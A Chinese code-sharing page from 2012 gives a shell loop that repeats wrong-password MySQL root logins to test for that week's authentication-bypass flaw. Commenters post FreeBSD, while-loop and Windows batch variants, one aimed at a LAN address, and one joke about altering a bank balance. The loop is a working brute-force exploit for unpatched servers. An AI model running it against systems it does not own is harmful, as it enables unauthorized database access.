当前访客身份:游客 [ 登录 | 加入开源中国 ]

代码分享

当前位置:
代码分享 » Shell/批处理  » 配置/脚本/批处理
红薯

MySQL 登录漏洞的测试脚本

红薯 发布于 2012年06月13日 8时, 44评/10198阅
分享到: 
收藏 +0
2
前两天 MySQL 爆出一个严重的登录漏洞,详情请看 这里。这个脚本用来测试 MySQL 是否存在此漏洞
该命令来自:http://ronaldbradford.com/blog/repost-a-tragically-comedic-security-flaw-in-mysql-2012-06-11/
标签: MySQL

代码片段(1) [全屏查看所有代码]

1. [代码][Shell/批处理]代码     跳至 [1] [全屏预览]

$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
mysql>


开源中国-程序员在线工具:Git代码托管 API文档大全(120+) JS在线编辑演示 二维码 更多»

发表评论 回到顶部 网友评论(44)

  • 1楼:waney 发表于 2012-06-13 08:35 回复此评论
    怎么用,看不懂。
  • 2楼:一寸飞 发表于 2012-06-13 08:47 回复此评论
    mysql命令行
  • 3楼:ginkgo_w 发表于 2012-06-13 08:47 回复此评论
    bash 脚本啊。就是一个for循环。
  • 4楼:dargoner 发表于 2012-06-13 08:48 回复此评论
    linux 执行了,没出来 mysql > 
  • 5楼:lion_yang 发表于 2012-06-13 08:57 回复此评论
    怎么没看到  mysql >
  • 6楼:时Stone 发表于 2012-06-13 08:59 回复此评论
    测试后没有出现mysql >
  • 7楼:喜之郎 发表于 2012-06-13 09:01 回复此评论
    哪家银行用的MySQL,偶想用这个去改我银行帐号的余额?远程连接别人256次 可以吗?
  • 8楼:fkkeee 发表于 2012-06-13 09:06 回复此评论
    FreeBSD 用这个
    for i in `jot 1000 1`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done

    如果成功,能看information_schema,(省略103字),知道了吧
  • 9楼:chaopeng 发表于 2012-06-13 09:10 回复此评论
    楼主自己测试过么?
  • 10楼:cha0xc 发表于 2012-06-13 09:12 回复此评论
    不是自编译的MySQL才中招么?
  • 11楼:冯继虎 发表于 2012-06-13 09:17 回复此评论
    经过测试CentOS5.6(64bit)+mysql5.1.60 测试无效。
  • 12楼:stck 发表于 2012-06-13 09:25 回复此评论
    CentOS下试试: while true; do mysql -u root mysql --password=baha; done
  • 13楼:glory 发表于 2012-06-13 09:32 回复此评论
    怎么玩,求高手指教啊。。
  • 14楼:回忆书签 发表于 2012-06-13 09:58 回复此评论
    呵呵。 我的没有中招
  • 15楼:VincentTone 发表于 2012-06-13 10:00 回复此评论
    应该是执行第一行,出现mysql命令行(即第二行)则有漏洞。
  • 16楼:黄平俊 发表于 2012-06-13 10:06 回复此评论
    压力不大~~居然没出现~~
  • 17楼:akin520 发表于 2012-06-13 10:11 回复此评论

    来个批处理的

    @echo off
    :loop
    mysql -h 192.168.10.107 -uroot --password=bad
    goto loop

  • 18楼:猪脑壳 发表于 2012-06-13 10:24 回复此评论
    编译的MYSQL 5.0.96也没有出现这问题。
  • 19楼:t568b 发表于 2012-06-13 10:35 回复此评论
    5.5.24 同样没出来mysql>
  • 20楼:xu81.com 发表于 2012-06-13 10:43 回复此评论
    现在看来这个是不是只在linux下有效?或者说有没有windows下的测试脚本。
开源从代码分享开始 分享代码